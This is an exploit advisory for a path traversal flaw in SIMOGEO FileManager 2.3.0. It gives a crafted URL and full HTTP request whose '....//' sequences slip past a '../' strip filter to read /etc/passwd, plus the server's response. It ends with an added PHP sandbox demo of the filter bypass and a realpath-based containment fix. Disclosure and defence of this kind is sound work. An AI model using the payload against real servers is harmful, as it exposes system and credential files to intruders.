SIMOGEO FileManager 2.3.0 Path Traversal
Posted on 12 February 2016
# Exploit Title: SIMOGEO FileManager 2.3.0 - Path Traversal Vulnerability
# Date: 2015-12-09
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: https://github.com/simogeo/Filemanager
# Software Link: git clone http://github.com/simogeo/Filemanager.git
# Version: 2.3.0
# Tested on: Debian [Wheezy]
# CVE : none

Path Traversal Code
http://192.168.0.15/vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd

Filtering Rules:
"../" -> blank

Bypass Filtering :
....// -> deleted "../" -> ../

Attack Request
GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

Response
HTTP/1.1 200 OK
Date: Tue, 08 Dec 2015 17:18:52 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze19
Content-Transfer-Encoding: Binary
Content-Length: 1383
Content-Disposition: inline; filename="passwd"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
..snip..
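
Why the '"../" -> blank' rule fails and what a canonical-path containment check does instead, as an added example that is not part of the original advisory or the Filemanager code base. strip_dotdot_once() is an assumed reconstruction of the filtering rule; resolve_inside(), the sandbox directory and the file names are hypothetical.

```php
<?php
// Added example. strip_dotdot_once() is an assumed reconstruction of the
// advisory's '"../" -> blank' rule, not the project's actual code.
function strip_dotdot_once($path) {
    // Single, non-recursive pass: "....//" loses its inner "../" and
    // what remains is a fresh "../".
    return str_replace('../', '', $path);
}

// Hypothetical hardened check: canonicalise first, then require the result
// to sit under the root. Returns the resolved path or false.
function resolve_inside($root, $userPath) {
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return false;
    }
    $full = realpath($rootReal . DIRECTORY_SEPARATOR . $userPath);
    if ($full === false) {
        return false;                     // missing file or broken path
    }
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : false;
}

// Constructed sandbox: userfiles/ok.txt is in scope, secret.txt stands in
// for any file outside the file manager's root.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fm_demo_' . uniqid();
$root = $base . DIRECTORY_SEPARATOR . 'userfiles';
mkdir($root, 0700, true);
file_put_contents($root . DIRECTORY_SEPARATOR . 'ok.txt', 'public');
file_put_contents($base . DIRECTORY_SEPARATOR . 'secret.txt', 'private');
$outside = realpath($base . DIRECTORY_SEPARATOR . 'secret.txt');

foreach (array('ok.txt', '../secret.txt', '....//secret.txt') as $input) {
    $filtered = strip_dotdot_once($input);
    $escaped  = realpath($root . DIRECTORY_SEPARATOR . $filtered) === $outside;
    $checked  = resolve_inside($root, $filtered);
    printf("%-18s filtered=%-15s filter-only escapes root: %-3s containment: %s\n",
        $input, $filtered, $escaped ? 'yes' : 'no',
        $checked === false ? 'rejected' : 'allowed');
}

// Remove the sandbox.
unlink($outside);
unlink($root . DIRECTORY_SEPARATOR . 'ok.txt');
rmdir($root);
rmdir($base);
```

Because the decision is made on the canonical path, it does not depend on how the traversal sequence was written in the request.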